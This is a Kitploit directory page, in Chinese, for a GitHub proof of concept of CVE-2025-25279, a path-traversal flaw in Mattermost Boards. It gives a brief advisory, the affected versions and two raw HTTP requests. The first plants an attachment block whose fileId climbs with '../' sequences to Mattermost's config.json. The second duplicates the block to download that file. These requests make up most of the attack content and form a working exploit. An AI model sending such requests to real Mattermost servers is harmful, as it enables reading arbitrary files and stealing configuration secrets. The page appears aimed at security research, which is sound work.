Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-25279 — 针对CVE-2025-25279的概念验证:Mattermost Boards中的路径遍历漏洞允许通过精心构造的导入归档和板块复制实现任意文件读取。 | Kitploit
工具/GitHubGitHub/numanturle/cve-2025-25279
漏洞分析漏洞利用Web应用程序漏洞利用数据泄露信息收集错误配置
GitHubnumanturle/cve-2025-25279

CVE-2025-25279

针对CVE-2025-25279的概念验证:Mattermost Boards中的路径遍历漏洞允许通过精心构造的导入归档和板块复制实现任意文件读取。

查看仓库
4231年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

安全公告 MMSA-2025-00430 / CVE-2025-25279

摘要

在将文件上传到 Mattermost 看板后,当修改 fileId 参数并复制看板时,文件现在指向并下载参数中指定的目标文件。

受影响版本: 启用了看板的 Mattermost 实例 CVE: CVE-2025-25279

描述

Mattermost 版本 10.4.x <= 10.4.1、9.11.x <= 9.11.7、10.3.x <= 10.3.2、10.2.x <= 10.2.2 未能正确验证导入看板时的看板块,导致攻击者可以通过导入和导出特制的导入归档文件来读取系统上的任意文件。

截图

Screenshot 1 Screenshot 2 Screenshot 3 Screenshot 4

root@kitploit:~
POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks HTTP/1.1
Host: localhost:8065
Content-Length: 403
Authorization: 
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive

[{"id":"7gni7t3q3gj6unkq49mpb3xzdre","schema":1,"boardId":"bqgcxem5wo3ncfxkbfn5rkawxcr","parentId":"crc1qdykm1pg4mbfpct45qnyorw","createdBy":"","modifiedBy":"","type":"attachment","fields":{"fileId":"../../../../../../../mattermost/config/config.json"},"title":"CVE-2025-25279.txt","createAt":1740423098470,"updateAt":1740423098470,"deleteAt":0,"limited":false,"isUploading":false,"uploadingPercent":0}]
root@kitploit:~
POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks/crc1qdykm1pg4mbfpct45qnyorw/duplicate?asTemplate=false HTTP/1.1
Host: localhost:8065
Content-Length: 0
Authorization: 
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive


参考

  • Mattermost 安全更新
  • CWE-200:信息暴露
  • CVE-2025-25279

功劳不属于我,包含审查

下载工具